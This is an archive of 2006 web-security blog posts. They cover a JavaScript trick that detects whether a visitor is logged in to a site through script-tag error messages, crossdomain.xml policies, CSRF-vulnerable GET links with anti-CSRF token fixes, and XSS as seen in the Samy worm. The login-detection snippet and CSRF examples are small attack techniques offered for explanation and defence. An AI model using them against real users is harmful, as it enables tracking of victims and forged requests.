About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


All posts for Dec 2006

JavaScript Login Check

Jeremiah discovered a creative technique for testing to see whether someone is logged in on a particular site. The approach is pretty simple - when you browse a web site, each page is often different depending upon whether you're currently logged in. This may not be the case for every page on the target site, but it's pretty easy to find at least one page where it is. This distinction is the basis of the technique.

Using <script src="">, you can cause a victim's browser to load a page and treat it as JavaScript. If the page isn't really JavaScript, an error is generated. If the page is different depending upon whether the victim is logged in, the error is also different. Pretty simple, right?

Here's an example:

<script src="http://amazon.com/"></script>

If you load a page with this <script> tag, you'll see an error in the error console:

The first error is generated when I am logged in. The second is generated when I'm not. Although only the line numbers differ, that's enough to distinguish between the two.

This could be a nice technique to use in combination with CSRF, because an attack could test whether the victim is currently logged in on a particular site before trying to forge any requests. (It also gives the attacker better statistics for the attack's success rate.)

Try it out for yourself, and be sure to view the source to see how it works. It's easy to add more tests. Here's the one for Amazon:

'http://amazon.com/': { 
    'name': 'Amazon', 
    'login_msg': 'missing } in XML expression', 
    'login_line': '114', 
    'logout_msg': 'missing } in XML expression', 
    'logout_line': '113',     
}

By the way, Zreel Puevfgznf!

YouTube Fixes Security Vulnerability

Until recently, YouTube has been vulnerable to cross-domain Ajax attacks due to their open crossdomain.xml policy. I notified them as soon as I discovered the vulnerability, and although I have yet to receive a reply, it appears they have fixed the problem:

<cross-domain-policy> 
    <allow-access-from domain="*.youtube.com" /> 
</cross-domain-policy>

Unfortunately, this is causing problems for some Flash / Flex developers who use YouTube's API, and no information has been published to provide a reason for the change or advice on how to work within the new constraints. In fact, I'm not positive that my report prompted the change. It could be a coincidence.

Renaun Erickson writes:

Seems like we need some Adobe dev center write ups in this area, touching on Mashups, Open APIs, and proper usage of crossdomain.xml when used with other systems in place.

I agree, but at the moment, Adobe is setting a bad example:

<cross-domain-policy> 
    <allow-access-from domain="*" /> 
    <allow-access-from domain="*.macromedia.com" secure="false" /> 
    <allow-access-from domain="*.adobe.com" secure="false" /> 
</cross-domain-policy>

Unlike Flickr, YouTube didn't just move their API to a separate domain. Instead, they closed it to *.youtube.com. Joe Berkovitz, a Flash / Flex developer and author of ReviewTube, would rather see them take Flickr's approach:

YouTube, if you want to be safe and not screw up Flash / Flex developers, please move your API to a different domain and put a liberal crossdomain.xml on that host. Thanks.

John Dowdell, who works for Adobe, also wrote about this issue. Hopefully Adobe will begin to educate developers about the security risks.

Google Web Accelerator Debate

I was browsing Ajaxian and stumbled upon a rant from late last year about Google Web Accelerator (GWA):

Google has reintroduced their Google Web Accelerator with a vengeance. It was evil enough the first time around, but this time it's downright scary.

This is sensationalism at its worst. There doesn't appear to be anything new since the first time this issue was discussed.

In case you missed it, the controversy is whether GWA should pre-fetch links on a page. Some web applications use links for important actions like deleting content, and when such "pages" are pre-fetched, GWA is actually performing these actions rather than just fetching content. There is apparently an ongoing debate about where to place the blame.

During 2002, I wrote HTTP Developer's Handbook. As a result, whether right or wrong, I have some pretty strong opinions about how the HTTP specification is being interpreted. However, before discussing SHOULD versus MUST, there is an important point being missed by those who are quick to blame Google for their own mistakes. Every example I have seen of a link that performs an action is either not going to be pre-fetched by GWA due to the presence of a query string, or it's vulnerable to CSRF (cross-site request forgeries). Sometimes it's both.

Here are some examples:

<a href="/delete.php?item=socks">Remove Socks from Cart</a>
<a href="/delete.php">Remove All from Cart</a></p>

Although only the second link is eligible for caching by GWA, both of these links are vulnerable to CSRF. (Read my article about CSRF if you're not sure what it is.) Anyone who is logged in and sends a request for one of these URLs will perform the indicated action. You can add an anti-CSRF token to these links to help protect against this vulnerability:

<a href="/delete.php?item=socks&token=abcd">Remove Socks from Cart</a>
<a href="/delete.php?token=abcd">Remove All from Cart</a>

If not an anti-CSRF token, you've got to use two-factor authentication or something to protect against CSRF.

The string abcd is a placeholder intended to represent a random string - a shared secret between the server and a single client. Because these links each include a query string, neither is eligible for caching by GWA. If you're like me, you hate query strings anyway, because they're ugly. :-) Let's try another example:

<a href="/delete/socks/abcd">Remove Socks from Cart</a>
<a href="/delete/all/abcd">Remove All from Cart</a>

Whether you prefer subject-verb or verb-subject, I think you'll agree that the presence of the anti-CSRF token in the URL is ugly. However, these links are both eligible for caching by GWA and not vulnerable to CSRF. Those who want to blame Google can only point to examples like this. As far as I know, it's the only type of link that presents a valid case against GWA's behavior, yet it's not one that I've seen cited anywhere.

Regarding the HTTP specification, there is the oft-quoted section on safe methods:

In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe". This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested.

Those who insist on violating this recommendation focus on the semantic distinction between SHOULD NOT and MUST NOT. Luckily, SHOULD NOT is well defined in another specification:

This phrase, or the phrase "NOT RECOMMENDED" mean that there may exist valid reasons in particular circumstances when the particular behavior is acceptable or even useful, but the full implications should be understood and the case carefully weighed before implementing any behavior described with this label.

What implications? :-)

Rules aside, using GET to perform actions violates a standard idiom that has become commonplace - clicking a link only fetches content. POST is represented differently for a reason. Browsers can warn before sending a POST request again (an issue I discuss in detail in one of my articles), whereas a GET request might be re-sent whenever the user navigates through the browser history. If such a request initiates an action, it can result in undesired behavior. Imagine losing your entire shopping cart contents, just because you went back a few pages. Would you bother continuing, or would you lose interest and leave? Food for thought.

Focusing on aesthetics alone, I can see where an interface designer might prefer a link for simple actions like logging out. Therefore, I asked my good friend Jon Tan to demonstrate how to use CSS to make a form submission button look exactly like a link. (This approach also happens to make it easy to add an anti-CSRF token.) He came through in style with an example that styles a button to look like a link.

I'll leave you with a funny statement by Mark Pilgrim that someone pointed out. It seems appropriate in this situation:

Besides the run-of-the-mill morons, there are two factions of morons that are worth special mention. The first work from examples, and ship code, and get yelled at, just like all the other morons. But then when they finally bother to read the spec, they magically turn into assholes and argue that the spec is ambiguous, misleading in some way, ignorable because nobody else implements it, or simply wrong. These people are called sociopaths. They will never write conformant code regardless of how good the spec is, so they can safely be ignored.

He continues with a description of the other faction:

The second faction of morons work from examples, ship code, and get yelled at. But when they get around to reading the spec, they magically turn into advocates and write up tutorials on what they learned from their mistakes. These people are called experts. Virtually every useful tutorial in the world was written by a moron-turned-expert.

To which faction do you belong?

Ajax Security

Recently, Jeremiah posted an article about Ajax security. He's a good writer and manages to clarify some misconceptions, but I disagree with one of his points about XSS. (I'll get to that in a minute.) His discussion on XSS begins with a question and (safe) answer:

Does Ajax make Cross-Site Scripting (XSS) attacks worse? I hope not.

He goes on to explain all of the exploits that are possible with plain JavaScript before touching on an important point about the social impact of Ajax:

Ajax has fired up interest in JavaScript. Research in JavaScript has led to new malware discoveries whose potential severity is amplified by ubiquitous XSS vulnerabilities.

A year ago, Keith Casey asked me a probing question about Ajax in an interview for CodeSnipers.com:

How does Ajax change security? Are developers prepared for it?

At that time, I hadn't given much thought to any of this, but I managed to give an answer that's still relevant today:

Within the next few years, we're certain to see more advanced cross-site scripting (XSS) attacks emerge, because client-side technologies are getting more and more sophisticated. The popularity of Ajax will also generate an increased number of attackers who possess a rich understanding of client-side technologies. In other words, Ajax won't make cross-site scripting (XSS) vulnerabilities more likely, but it will make them more dangerous.

Yes, Ajax makes XSS attacks worse. It's too late for "I hope not." :-)

Jeremiah does make a concession:

To be fair, the Samy Worm that hit MySpace and JS-Yamaner on Yahoo exploited XHR for propagation.

He qualifies this statement, however, with something that's not true:

The attack could have just as easily been perpetrated using plain JavaScript. Ajax is irrelevant in this scenario.

The reason this isn't true is buried within Samy's technical explanation:

Finally we can do a POST! However, when we send the post it never actually adds a friend. Why not? Myspace generates a random hash on a pre-POST page (for example, the "Are you sure you want to add this user as a friend" page). If this hash is not passed along with the POST, the POST is not successful. To get around this, we mimic a browser and send a GET to the page right before adding the user, parse the source for the hash, then perform the POST while passing the hash.

If this is possible without Ajax, we're all in big trouble. Via private email, Jeremiah clarified his point:

I was trying to say that just because the Samy worm used Ajax technology, it doesn't mean that if a web site (MySpace) uses it then it's at additional risk.

That's certainly true, and it underscores a very valid point being made in the article. However, I want to make sure people don't miss the fact that, regardless of whether you use Ajax, it can be used against you.

Web Builder 2.0 Recap

Web Builder 2.0 turned out to be a good conference. I must admit to being a bit tepid about this particular conference, because the "2.0" in the name made me think of vacuous marketing talks, but the webmaster track had some solid technical content, including talks by Ask and Cal. (Cal was the track chair.)

To the conference's credit, none of the 17 talks with Ajax in the title spelled it AJAX. Of course, I guess that would be like having a talk about PERL at YAPC. :-)

I spent the first day of the conference working, so I'm sure I missed some good talks. I spoke on the second day, after which I managed to catch Chris Lea of Media Temple speaking about the challenges of large scale hosting, which was interesting and informative.

My speaking style has been changing lately - I've been using mostly images and code examples in my slides. In fact, very few slides have any bullets at all, and I might try to adopt the habit of never using bullets again. It makes the slides less useful out of context, but I think it makes the talks themselves much better.

With a full room of people, only four people had ever heard about CSRF, and I think many walked out with work to do.

The slides are available here:

http://shiflett.org/security-2.0.pdf

Note: These slides will be linked from the OmniTI talks archive soon.